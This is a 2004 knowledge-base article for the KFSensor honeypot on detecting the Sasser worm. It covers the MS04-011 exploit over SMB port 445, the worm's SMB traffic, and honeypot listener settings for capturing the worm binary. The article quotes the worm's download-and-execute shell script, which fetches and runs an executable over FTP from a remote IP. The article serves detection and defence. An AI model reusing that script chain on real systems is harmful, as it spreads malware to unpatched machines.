KeyFocus - KFSensor Knowledge Base - Sasser
 

KeyFocus

 KFSensor
 About
 Overview
 Screen shots
 Features
 Compare editions
 Download trial
 Buy KFSensor
 News
 Manual
 Knowledge Base
 Links
 Extras
 Factsheet (.pdf)
 

Sasser worm, attack detection

1 May 2004

This article describes how to recognize a Sasser worm attack in KFSensor and how to extend the configuration of KFSensor to capture more information, including a copy of the Sasser worm executable itself.

Worm Information

The Sasser worm exploits the Microsoft Windows Utility Manager Vulnerability (MS04-11). The attack is made via the Windows networking (SMB) port number 445, to access the accessibility options within the operating system which are designed to help users with disabilities. The Utility Manager loads winhlp32.exe but does not drop System privileges, thus allowing the remote attack to be made.

Microsoft released a patch for this exploit on 4/12/2004. All unpatched machines with Windows networking enabled are vulnerable to this exploit.

Sasser infection method

Sasser connects to a target machine on port 445 and gets it to execute piece of shell code.
If the successful a command line shell is bound to port 9996 on the target machine.
Sasser will then execute a script on the remote machine via the shell that will download and install a copy of the sasser worm via FTP, from a mini FTP server that Sasser has installed on the local machine of port 5554.

Detecting Sasser in KFSensor

KFSensor was already prepared to detect Sasser the moment it was released.

The initial Sasser attack is made via the SMB port 445.

The KFSensor event will appear on TCP port 445 and be approx 9297 received bytes.

The full received data from the worm is as follows:
SMB:1 [neg protocol]
  Protocols:
    PC NETWORK PROGRAM 1.0
    LANMAN1.0
    Windows for Workgroups 3.1a
    LM1.2X002
    LANMAN2.1
    NT LM 0.12

SMB:2 [session setup X]

SMB:4 [tree con X]
    {\\88.88.88.88\ipc$[00]?????}

SMB:5 [nt createX]
    Flags:16 Access:2019F Createop:40 Imp:2
    {\lsarpc[00]}
SMB:6 [trans]
    name: {[10]\PIPE\[00 00]}

SMB:7 [write X]
    Write 4280 bytes at offset 0, timeout(-1) startMessage

SMB:8 [trans]
    name: {\PIPE\[00 00]}

The worm attempts to access the lsarpc pipe and carry out the exploit.

The Sasser worm attempts to execute the following shell script on port 9996:
echo off
&echo open 81.154.214.85 5554>>cmd.ftp
&echo anonymous>>cmd.ftp
&echo user&echo bin>>cmd.ftp
&echo get 645_up.exe>>cmd.ftp
&echo bye>>cmd.ftp
&echo on&ftp -s:cmd.ftp
&645_up.exe&echo off
&del cmd.ftp&echo on

Custom configuration for Sasser

To improve the detection of the Sasser worm and to enable deception of future attempts by hackers to detect the worm then it is necessary to make the following configuration of KFSensor.

If you have not already set up KFSensor to emulate Windows networking then you will need to do so.

Add the following definition to emulate the Sasser target shell console

  1. Select the Scenario -> Edit Scenarios… menu option.
  2. Select a scenario and press the Edit button
  3. Add a new Listen definition
    Name: Sasser worm console
    Protocol: TCP
    Port: 9996
    Time Out: 10000 Action Type: Read And Close
    Press OK.

Add the following definition to emulate the Sasser target FTP server

  1. Select the Scenario -> Edit Scenarios… menu option.
  2. Select a scenario and press the Edit button
  3. Add a new Listen definition
    Name: Sasser worm FTP
    Protocol: TCP
    Port: 5554
    Time Out: 10000 Action Type: Read And Close
    Press OK.

Capturing the Sasser worm executable

It is possible to safely download a copy of the worm, for later analysis.
By using a virus checker the worm executable can be identified and there is always the possibility of identifying a new variant

Configuration

The following configuration uses a KFSensor external alert and a PERL script.

  1. Download the file sassercapture.zip
  2. Unzip the file and extract sassercapture.pl to C:\Program Files\KeyFocus\KFSensor\files\scripts
  3. If you do not already have a Listen defined on TCP port 9996 then you will need to set this up.
  4. Select the Settings->External Alerts menu item
  5. Select the Enable check box
  6. Press the Add... button
  7. Fill in the details as follows:

    The Argument field contains:
    "C:\Program Files\KeyFocus\KFSensor\files\scripts\sassercapture.pl" $eventid
    The Working directory field contains:
    "C:\kfsensor\sasser"
    You will need to create this directory in Windows Explorer.
  8. Press return twice

Results

Warning: When PERL executes the command tfpt then a console window will appear on the screen as the tftp executes.
This will close automatically then ftp completes its execution.

When a sassor worm connects to TCP port 9996 the data it sends will be captured and the PERL script will download the executable and add the event to its own report file.

The log file is called sasserlog.txt and is a tab separated file containing the following fields; EventID,Time,SourceIP,FileName and LocalFileName.

The executable is given the following name: sasser_<filename>_<eventid>.bin
e.g. sasser_22912_up_exe_298961.bin